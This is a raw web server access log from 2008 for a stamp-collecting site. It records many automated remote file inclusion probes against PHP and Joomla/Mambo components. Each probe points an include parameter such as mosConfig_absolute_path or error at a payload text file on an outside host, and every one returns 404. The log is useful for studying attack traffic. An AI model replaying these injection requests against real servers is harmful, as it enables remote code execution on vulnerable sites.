195.93.200.219 - - [03/Aug/2008:18:29:56 -0700] "GET /logs/access_080526.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.93.200.219 - - [03/Aug/2008:18:29:56 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.93.200.219 - - [03/Aug/2008:18:29:56 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.15.8.80 - - [03/Aug/2008:18:32:24 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:18:33:34 -0700] "GET /images/errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
74.53.240.146 - - [03/Aug/2008:18:33:35 -0700] "GET /logs/images/errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
67.15.8.80 - - [03/Aug/2008:18:37:59 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.8.80 - - [03/Aug/2008:18:37:59 -0700] "GET //include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.8.80 - - [03/Aug/2008:18:38:10 -0700] "GET /logs/access_080421.log//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.8.80 - - [03/Aug/2008:18:38:17 -0700] "GET /logs/access_080526.log//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
194.79.75.195 - - [03/Aug/2008:18:40:11 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
194.79.75.195 - - [03/Aug/2008:18:40:11 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
194.79.75.195 - - [03/Aug/2008:18:42:29 -0700] "GET //pjsfiles/modify.php?installed_config_file=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
194.79.75.195 - - [03/Aug/2008:18:42:29 -0700] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.mathstamps.com"
74.6.22.92 - - [03/Aug/2008:18:49:37 -0700] "GET /logs/scripts.log HTTP/1.0" 200 42401 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
62.231.161.4 - - [03/Aug/2008:18:52:01 -0700] "GET /logs/access_080602.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
62.231.161.4 - - [03/Aug/2008:18:52:02 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
62.231.161.4 - - [03/Aug/2008:18:52:03 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:18:53:36 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:18:53:36 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:18:53:36 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
66.90.73.113 - - [03/Aug/2008:18:53:38 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
202.221.143.111 - - [03/Aug/2008:18:55:24 -0700] "GET /logs/access_080609.log/index.php?option=com_rwcardshttp://bo.refrige.pt/img/top.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [03/Aug/2008:18:55:25 -0700] "GET /index.php?option=com_rwcardshttp://bo.refrige.pt/img/top.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [03/Aug/2008:18:55:25 -0700] "GET /logs/index.php?option=com_rwcardshttp://bo.refrige.pt/img/top.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:18:56:46 -0700] "GET /logs/access_080630.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:18:56:46 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:18:56:47 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:18:56:48 -0700] "GET /logs/access_080707.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:18:59:47 -0700] "GET /logs/access_080630.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:18:59:47 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:18:59:47 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:18:59:47 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:18:59:48 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:18:59:48 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:18:59:50 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.92.80.1 - - [03/Aug/2008:18:59:50 -0700] "GET /logs/access_080707.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:19 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:20 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:20 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:00:21 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:00:21 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:00:21 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:23 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:34 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:34 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:35 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:00:35 -0700] "GET /logs/access_080707.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:00:36 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
62.231.161.4 - - [03/Aug/2008:19:00:36 -0700] "GET /logs/access_080505.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:36 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:00:37 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:47 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:47 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:48 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:00:53 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:00:54 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:01:14 -0700] "GET /logs/access_080526.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:31 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:31 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:32 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:34 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:35 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:35 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:36 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:36 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:01:46 -0700] "GET /logs/access_080707.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:01:46 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:01:46 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:52 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:52 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:52 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:53 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:53 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:53 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:53 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:01:55 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:02:12 -0700] "GET /logs/access_080616.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
217.172.161.101 - - [03/Aug/2008:19:02:25 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:04:04 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:04:04 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:04:04 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:04:05 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:05:41 -0700] "GET /logs/access_080630.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:05:41 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:05:41 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:19:05:43 -0700] "GET /logs/access_080707.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:19:06:18 -0700] "GET /logs/access_080519.log//skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
195.39.5.203 - - [03/Aug/2008:19:06:21 -0700] "GET //skin/zero_vote/error.php?dir=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
193.239.211.19 - - [03/Aug/2008:19:06:33 -0700] "GET /send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.239.211.19 - - [03/Aug/2008:19:06:33 -0700] "GET /logs/access_080505.log/send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.239.211.19 - - [03/Aug/2008:19:06:33 -0700] "GET /logs/send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.239.211.19 - - [03/Aug/2008:19:06:37 -0700] "GET /logs/access_080623.log/send_reminders.php?noSet=0&includedir=http://institut-tibetain.org/cms/tmp/configs/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.111.172.23 - - [03/Aug/2008:19:07:32 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:07:38 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:07:38 -0700] "GET /logs/access_080616.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:07:38 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:08:22 -0700] "GET /logs/access_080623.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:08:23 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:08:23 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:08:37 -0700] "GET /logs/access_080421.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:08:37 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:08:38 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:09:07 -0700] "GET /logs/access_080707.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:09:32 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:12:19 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:12:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:12:22 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:13:06 -0700] "GET /logs/access_080602.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
216.183.105.230 - - [03/Aug/2008:19:13:07 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
